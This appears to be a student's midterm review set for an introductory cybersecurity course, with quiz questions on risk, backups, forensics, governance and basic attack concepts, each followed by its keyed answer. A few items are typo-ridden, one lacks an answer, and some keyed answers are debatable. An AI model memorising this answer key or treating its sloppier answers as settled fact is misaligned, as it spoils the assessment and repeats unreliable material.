Cybersecurity Midterm Review
What is the purpose of the SETA program?
A SETA program is a security control measure that is designed to increase employees knowledge of security measures through education, training, and awareness activites.
Comparing the hash value of a file allows a security professional to:
a. Verify the authenticity of a file or application b. Report the software manufacturer about a defect c. Determine if the file is corrupt d. Respond to malware A
The ______ hijacking attack uses IP spoofing to enable an attacker to impersonate another entity on the network.
a. WWW b. FTP c. HTTP d. TCP D
The storage of duplicate online transaction data, along with the duplication of the databases, at a remote site on a redundant server is called _____.
a. application recovering b. database shadowing c. remote journaling d. electronic vaulting B
A long-term interruption (outage) in electrical power availability is known as a(n) ______.
a. brownout b. sag c. fault d. blackout D
In early 2014, in response to Executive Order 13636, NIST published the Cybersecurity Framework, which intends to allow organizations to _____.
a. communicate among local, state, and national agencies about cybersecurity risk b. identify and prioritize opportunities for improvement within the context of a continuous and repeatable process c. None of these d. assess progress toward a recommended target state B
Which of the following is a valid type of role when it comes to data ownership?
a. data owners b. data users c. data custodians d. all of the above D
Digital forensics involves the _____, identification, extraction, documentation, and interpretation of digital media.
a. determination b. confiscation c. preservation d. investigation C
A table of hash values and their corresponding plaintext values that can be used to look up password values if an attacker is able to steal a system's encrypted password file is known as a(n) ______.
a. dictionary b. rainbow table c. crib d. crack file B
A server would experience a(n) __________ attack when a hacker compromises it to acquire information via a remote location using a network connection.
a. direct b. indirect c. hardware d. software A
Flaws or weaknesses in an information asset, security procedure, design, or control that can be exploited accidentally or on purpose to breach security are known as _____.
a. events b. exploits. c. vulnerabilities d. threats C
A technique used to compromise a system is known as a(n) ___________.
a. exploit b. access method c .risk d. asset A
Data backup should be based on a(n) ____ policy that specifies how long log data should be maintained.
a. incident response b. business resumption c. replication d. retention D
The stated purpose of ISO/IEC 27002:2013 is to give guidelines for organizational information security standards and information security_____ practices.
a. management b. accreditation c. certification d. implementation A
The average amount of time until the next hardware failure is known as ______.
a. mean time between failure (MTBF) b. mean time to repair (MTTR) c. mean time to diagnose (MTTD) d. mean time to failure (MTTF) D
The actions taken by management to specify the intermediate goals and objectives of the organization are _____.
a. operation planning g b. contingency planning c. strategic planning d. tactical planning D
Which of the following is NOT one of the categories recommended for categorizing information assets?
a. people b. hardware c. firmaware d. software C
A(n) _____ is a document containing contact information for the people to be notified in the event of an incident.
a. phone list b. alert roster c. emergency notification system d. call registry B
The point in time before a disruption or system outage to which business process data can be recovered after an outage is ____.
a. recovery point objective (RPO) b. maximum tolerable downtown (MTD) c. work time recovery (WTR) d. recovery time objective (RTO) A
The first phase of the risk management process is _____.
a. risk identification b. risk evaluation c. forming the risk management team d. risk control A
The sworn testimony that certain facts are in the possession of an investigating officer and that they warrant the examination of specific items located at a specific place is called a(n) _____.
a. search warrant b. writ of habeas corpus c. affidavit d. sworn warrant C
The concept of competitive _____ refers to falling behind the competition.
a. shortcoming b. failure c. drawback d. disadvantage D
The goals of information security governance include all but which of the following?
a. Strategic alignment of information security with business strategy to support organizational objectives b. Risk management by executing appropriate measures to manage and mitigate threats to information resources c. Regulatory compliance by using information security knowledge and infrastructure to support minimum standards of due care d. Performance measurement by measuring, monitoring, and reporting information security governance metrics to ensure that organizational objectives are achieved C
Most common data backup schemes involve ______.
a.. RAID b. disk to disk to cloud c. neither d. both D
_ of information is the quality or state of being genuine or original, rather than a reproduction or fabrication.
Authenticity
________ enables authorized users—people or computer systems—to access information without interference or obstruction and to receive it in the required format.
Availability
Describe residual risk.
Residual risk is the remaining risk after controls designed to mitigate risk have been implemented. The goal of risk management is not to bring risk levels to zero, but to bring the amount of residual risk in line with the organization's risk appetite.
Describe worms and viruses
Virus: consist of code segments that attach to existing programs and take control of access to the targeted computer Worms: replicate themselves until they completely fill available resources such as memory and hard drive space
_____ is simply how often you expect a specific type of attack to occur.
a. CBA b. ALE c. ARO d. SLE C
The ______ is the individual primarily responsible for the assessment, management, and implementation of information security in the organization.
a. CISO b. CTO c. CIO d. ISO A
The _____is the high-level information security policy that sets the strategic direction, scope, and tone for all of an organization's security efforts.
a. GSP b. EISP c. SSySP d. ISSP B
In Windows 10/11, check all the options available within Windows Hello to authenticate to a device:
a. PIN b. security key c. face d. fingerprint e. picture
In Linux, from a terminal window, which command will list all the subfolders included in the current working folder?
a. PWD b. CAT c. Dir d. Rmdir C
The redirection of legitimate user Web traffic to illegitimate Web sites with the intent to collect personal information is known as ______.
a. spoofing b.sniffing c. phishing d. pharming D
A computer is the __________ of an attack when it is used to conduct an attack against another computer.
a. target b. subject c. facilitator d. object B
In a _____, assets or threats can be prioritized by identifying criteria with differing levels of importance, assigning a score for each of the criteria, and then summing and ranking those scores.
a. threat assessment b. weight table analysis c. risk management program d. data classification scheme B
In Linux, from a terminal window, what special character added to the end of an application name will launch that application in the background?
ampersand &
Disaster _____ is the process of examining an adverse event or incident and determining whether it constitutes an actual disaster.
classification
E-mail spoofing involves sending an e-mail message with a harmful attachment.
false
The bottom-up approach to information security has a higher probability of success than the top-down approach.
false
Within a data classification scheme, "comprehensive" means that an information asset should fit in only one category.
false
You cannot use qualitative measures to rank information asset values.
false
An attack, breach of policy, or other incident always constitutes a violation of law, requiring notification of law enforcement.
false
The _____ treatment strategy attempts to reduce the impact caused by the exploitation of vulnerability through planning and preparation.
mitigation
A(n) _____ directs members of an organization as to how issues should be addressed and how technologies should be used.
policy
After identifying and performing the preliminary classification of an organization's information assets, the analysis phase moves on to an examination of the _____ facing the organization.
threats
Evidentiary material is any information that could potentially support an organization's legal or policy-based case against a suspect.
true
Much human error or failure can be prevented with effective training and ongoing awareness activities.
true
Organizations can use dictionaries to regulate password selection during the reset process and thus guard against easy-to-guess passwords.
true
To achieve defense in depth, an organization must establish multiple layers of security controls and safeguards.
true
